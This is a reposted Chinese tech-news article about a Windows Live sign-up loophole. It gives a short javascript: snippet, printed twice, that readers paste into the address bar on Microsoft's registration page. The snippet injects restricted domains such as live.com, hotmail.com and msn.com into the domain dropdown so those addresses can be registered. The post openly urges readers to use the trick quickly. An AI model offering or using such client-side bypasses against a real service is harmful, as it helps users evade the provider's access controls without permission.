作家
登录

Windows Live的@live.com域名注册漏洞 利用代码

作者: 来源:www.28hudong.com 2013-03-30 03:51:51 阅读 我要评论

又一个Windows Live的@live.com域名注册漏洞被发现,现在我们只要通过简单的一段JS代码就可以给Windows Live的注册界面添加@live.com地址,让人惊讶的是,硬塞进去的地址竟然可以成功注册到帐号!又是一次极好的机会,大家快来一起上吧! Update:更新代码,提供更多域名,包括live.cn方法简单:1、进入这个页面:http://get.live.com/getlive/overview2、点击”立即注册“按钮3、在地址栏粘贴以下文件中的代码,并回车:复制代码 代码如下:javascript:function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options);r(d="live.");r(a = new Array("hotmail.com","hotmail.co.uk","msn.com",d+"com",d+"be",d+"co.uk",d+"de",d+"fr",d+"it",d+"nl",d+"cn")); for (i=0;i<a.length;i++){ s(i ) }alert("Success - additional domains added!"); 分析后:复制代码 代码如下:javascript: function r(q){} function s(q){e[q] = new Option(a[q],a[q])}; r(e = document.getElementById("idomain").options); r(d="live."); r(a = new Array("hotmail.com","hotmail.co.uk","msn.com",d+"com",d+"be",d+"co.uk",d+"de",d+"fr",d+"it",d+"nl",d+"cn")); for (i=0;i<a.length;i++){ s(i ) } alert("Success - additional domains added!");

  推荐阅读

  JavaScript高级程序设计

前一章简要谈及对象的使用,现在要详细介绍它们了。对象的创建或销毁都在JavaScript执行过程中发生,理解这种范式的含义对理解整个语言至关重要。 3.2.1 声明和实例化 对象是用关键字new后跟要实例化的类的名字创>>>详细阅读


本文标题:Windows Live的@live.com域名注册漏洞 利用代码

地址:http://www.17bianji.com/kaifa2/JS/31185.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)